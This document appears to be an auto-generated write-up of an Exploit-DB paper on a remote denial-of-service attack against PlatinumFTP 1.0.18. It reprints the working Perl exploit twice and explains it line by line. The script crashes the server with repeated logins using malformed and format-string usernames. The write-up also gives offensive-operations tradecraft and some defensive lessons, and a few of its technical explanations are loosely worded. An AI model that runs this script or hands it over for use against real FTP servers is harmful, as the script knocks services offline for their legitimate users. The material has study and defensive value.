PlatinumFTP 1.0.18 - Remote Denial of Service (DoS) Exploitation

What this paper is

This paper describes a Perl script that exploits multiple remote Denial of Service (DoS) vulnerabilities in PlatinumFTP version 1.0.18. The script aims to crash the FTP server by sending malformed login credentials, making it unavailable to legitimate users.

Simple technical breakdown

The script works by connecting to the target PlatinumFTP server and attempting to log in with specially crafted usernames. These usernames are designed to trigger a crash in the server's handling of login requests. The script then enters a loop, repeatedly attempting to connect and log in, ensuring the server remains in a crashed state or is repeatedly crashed.

Complete code and payload walkthrough

#!/usr/bin/perl
#
# pftpdos-ai1.pl - Remote DoS against PlatinumFTP 10.1.18
# Details:http://seclists.org/lists/bugtraq/2005/Mar/0222.html
#
# If you don't get the server down try to change/play a little bit with
# the Timeout
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il
#
# Thanks to str0ke from milw0rm for forcing me to shrink 3 PoCs into 1 :)
#
# 2005/05/03 portsonline.net

use strict;
use Net::FTP;

my $host;
my $username;
my $dostype;

if ($#ARGV < 1) { &syntax(); }

$host = $ARGV[0];
$dostype = $ARGV[1];

if ($dostype == '1') { $username = '\\'; }
if ($dostype == '2') { $username = '%s%s%s%s'; }
if ($dostype == '3') { $username = '%.1024d'; }

my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21)
or die "can you see a ftp server? i can't.\n";

print "denial of service tpye $dostype in progress\n";

while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
    my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
    $ftp->login($username);
}

print "server is down. now run forest, RUN!\n";

sub syntax {
    print "Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)\n\n";
    print "DOSTYPE: 1 Using '\\' Username \n";
    print "DOSTYPE: 2 Using '%s%s%s%s' Username \n";
    print "DOSTYPE: 3 Using '%.1024d' Username \n";
    exit (1);
}

# milw0rm.com [2005-03-17]

Code Fragment/Block -> Practical Purpose

#!/usr/bin/perl: Shebang line, indicates the script should be executed with the Perl interpreter.
use strict;: Enforces stricter parsing rules in Perl, helping to catch common errors.
use Net::FTP;: Imports the Net::FTP module, which provides functionality for interacting with FTP servers.
my $host; my $username; my $dostype;: Declaration of variables to store the target host IP, the crafted username, and the type of DoS attack to perform.
if ($#ARGV < 1) { &syntax(); }: Checks if at least two command-line arguments (host and dostype) are provided. If not, it calls the syntax() subroutine to display usage instructions and exits. $#ARGV is the index of the last element in the @ARGV array.
$host = $ARGV[0];: Assigns the first command-line argument (the target IP address) to the $host variable.
$dostype = $ARGV[1];: Assigns the second command-line argument (the DoS type) to the $dostype variable.
if ($dostype == '1') { $username = '\\'; }: If dostype is '1', sets the username to a single backslash (\). This is likely intended to cause issues with path parsing or string handling on the server.
if ($dostype == '2') { $username = '%s%s%s%s'; }: If dostype is '2', sets the username to a format string (%s%s%s%s). This could trigger a format string vulnerability if the server improperly processes the username during logging or display.
if ($dostype == '3') { $username = '%.1024d'; }: If dostype is '3', sets the username to a format string (%.1024d). This is a format string specifier that attempts to print a large number of characters (1024 'd' characters, though 'd' is for integers, it might be interpreted as a string length specifier or trigger a different parsing path). This is a classic technique for buffer overflows or crashes by overwhelming string formatting buffers.
my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21) or die "can you see a ftp server? i can't.\n";: Attempts to establish an initial FTP connection to the target host on port 21 with a 2-second timeout. If the connection fails, it prints an error message and exits. Debug => 0 means no debugging output from the Net::FTP module.
print "denial of service tpye $dostype in progress\n";: Informs the user that the DoS attack is starting.
while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21)) { ... }: This while loop is the core of the DoS mechanism.
- my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21): Inside the loop, it re-establishes an FTP connection. This is somewhat redundant as the loop condition already checks for a successful connection.
- my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);: Crucially, this line re-declares and re-assigns $ftp to a new connection object with a very short timeout (0.1 seconds). This new connection is immediately used. The previous connection established by the while condition is effectively discarded.
- $ftp->login($username);: Attempts to log in to the FTP server using the crafted $username. This is the action that is expected to trigger the vulnerability and crash the server.
print "server is down. now run forest, RUN!\n";: Prints a success message if the loop terminates (which implies the server is no longer responding, hence "down").
sub syntax { ... }: Defines a subroutine named syntax.
- print "Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)\n\n";: Prints the correct command-line usage.
- print "DOSTYPE: 1 Using '\\' Username \n";: Explains DoS type 1.
- print "DOSTYPE: 2 Using '%s%s%s%s' Username \n";: Explains DoS type 2.
- print "DOSTYPE: 3 Using '%.1024d' Username \n";: Explains DoS type 3.
- exit (1);: Exits the script with a non-zero status code, indicating an error (in this case, incorrect usage).

Payload/Shellcode Explanation:

There is no traditional shellcode or executable payload in this script. The "payload" is the specially crafted username string passed to the login() function. The script relies on the vulnerability within PlatinumFTP's login handling to cause a crash.

Username \ (DoS Type 1): This might cause the FTP server to misinterpret the username as a path component or an escape character, leading to an error in its internal string processing or file system interaction.
Username %s%s%s%s (DoS Type 2): This is a format string. If the FTP server uses a function like printf or sprintf to process the username without proper sanitization, it could lead to a crash by attempting to read from or write to arbitrary memory locations, or by consuming excessive resources.
Username %.1024d (DoS Type 3): This is another format string. The %.1024d specifier is intended to print a decimal integer, but with a precision of 1024. This could cause a buffer overflow if the server attempts to format this string into a fixed-size buffer, or it could trigger a crash due to invalid format specifier handling or excessive memory allocation.

Practical details for offensive operations teams

Required Access Level: Network access to the target host on port 21 (FTP). No prior authentication or local access is required.
Lab Preconditions:
- A target machine running PlatinumFTP version 1.0.18.
- A network path allowing the attacker's machine to reach the target's FTP port (21).
- A Perl interpreter installed on the attacker's machine.
- The Net::FTP Perl module installed.
Tooling Assumptions:
- Perl interpreter.
- Net::FTP module (standard with most Perl installations).
- A text editor to save the script.
- A terminal or command prompt to execute the script.
Execution Pitfalls:
- Incorrect Version: The exploit is specific to PlatinumFTP 1.0.18. Targeting other versions or FTP servers will likely fail.
- Network Issues: Firewalls blocking port 21, network latency, or packet loss can prevent the script from establishing connections or delivering the payload.
- Server Configuration: Some FTP servers might have built-in protections against malformed login attempts or might not be vulnerable to these specific string manipulations.
- Timeout Values: The script uses Timeout => 2 and Timeout => 0.1. If the server is very slow to respond, these timeouts might need adjustment. The paper itself suggests playing with the Timeout value.
- Loop Logic: The while loop's structure is a bit unusual. It establishes a connection, then immediately creates another connection with a shorter timeout, and then uses that second connection for the login. This could be a subtle way to ensure a fresh, potentially vulnerable, connection is used for the attack.
- False Positives: If the server is already unstable or under heavy load, it might crash for reasons unrelated to the script, leading to a false sense of exploit success.
Tradecraft Considerations:
- Reconnaissance: Confirming the FTP service is running and identifying the specific version of PlatinumFTP is critical. Banner grabbing or vulnerability scanning tools can assist.
- Stealth: FTP traffic is typically unencrypted. While this script is for DoS, any network monitoring could reveal the connection attempts and malformed login data. For authorized operations, ensure proper authorization and notification procedures are followed.
- Impact Assessment: A DoS attack renders the service unavailable. Understand the business impact and operational consequences before execution.
- Testing: Always test in a controlled lab environment that mirrors the production setup as closely as possible.

Where this was used and when

Context: This exploit targets a specific vulnerability in PlatinumFTP 1.0.18. It was likely developed and shared by security researchers to demonstrate the vulnerability.
Timeframe: The paper was published on March 17, 2005. The exploit script itself has a modification date of May 3, 2005. Therefore, this vulnerability and exploit were relevant around 2005.

Defensive lessons for modern teams

Patch Management: Keep FTP server software (and all other services) updated to the latest stable versions. Vulnerabilities like these are typically fixed in later releases.
Input Validation: Applications should rigorously validate all user inputs, especially those that are processed by system functions or formatted into strings. This includes usernames, passwords, file paths, and any data received from external sources.
Secure Coding Practices: Developers should avoid using vulnerable functions (like printf with user-supplied input) and understand the risks associated with format string vulnerabilities.
Network Segmentation and Firewalls: Limit access to sensitive services like FTP from untrusted networks. Use firewalls to restrict access to only necessary IP addresses and ports.
Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS solutions can detect patterns of malformed requests or brute-force login attempts that might indicate an exploit in progress.
Service Hardening: Configure FTP servers securely. Disable anonymous access if not needed, use strong authentication, and consider using SFTP or FTPS for encrypted transfers.

ASCII visual (if applicable)

This exploit is a direct client-to-server interaction. An ASCII visual might overcomplicate the simple request-response nature. The core interaction is:

Attacker Machine (Perl Script)
        |
        |  1. Connect (TCP 21)
        |  2. Send USER <crafted_username>
        |  3. (Server Crashes)
        |  4. Repeat connection attempts
        |
        v
Target FTP Server (PlatinumFTP 1.0.18)

Source references

Paper ID: 886
Paper Title: PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Vulnerabilities
Author: ports
Published: 2005-03-17
Keywords: Windows, dos
Paper URL: https://www.exploit-db.com/papers/886
Raw URL: https://www.exploit-db.com/raw/886
Related Discussion: http://seclists.org/lists/bugtraq/2005/Mar/0222.html

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
#
# pftpdos-ai1.pl - Remote DoS against PlatinumFTP 10.1.18
# Details:http://seclists.org/lists/bugtraq/2005/Mar/0222.html
#
# If you don't get the server down try to change/play a little bit with
# the Timeout
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il
#
# Thanks to str0ke from milw0rm for forcing me to shrink 3 PoCs into 1 :)
#
# 2005/05/03 portsonline.net

use strict;
use Net::FTP;

my $host;
my $username;
my $dostype;

if ($#ARGV < 1) { &syntax(); }

$host = $ARGV[0];
$dostype = $ARGV[1];

if ($dostype == '1') { $username = '\\'; }
if ($dostype == '2') { $username = '%s%s%s%s'; }
if ($dostype == '3') { $username = '%.1024d'; }

my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21)
or die "can you see a ftp server? i can't.\n";

print "denial of service tpye $dostype in progress\n";

while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
    my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
    $ftp->login($username);
}

print "server is down. now run forest, RUN!\n";

sub syntax {
    print "Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)\n\n";
    print "DOSTYPE: 1 Using '\\' Username \n";
    print "DOSTYPE: 2 Using '%s%s%s%s' Username \n";
    print "DOSTYPE: 3 Using '%.1024d' Username \n";
    exit (1);
}

# milw0rm.com [2005-03-17]

By exploitdb papers bot•March 17, 2005•

papers